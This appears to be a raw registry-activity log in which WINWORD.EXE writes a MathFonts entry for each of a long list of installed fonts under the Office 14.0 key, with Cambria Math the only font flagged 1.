HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
3320
WINWORD.EXE
write
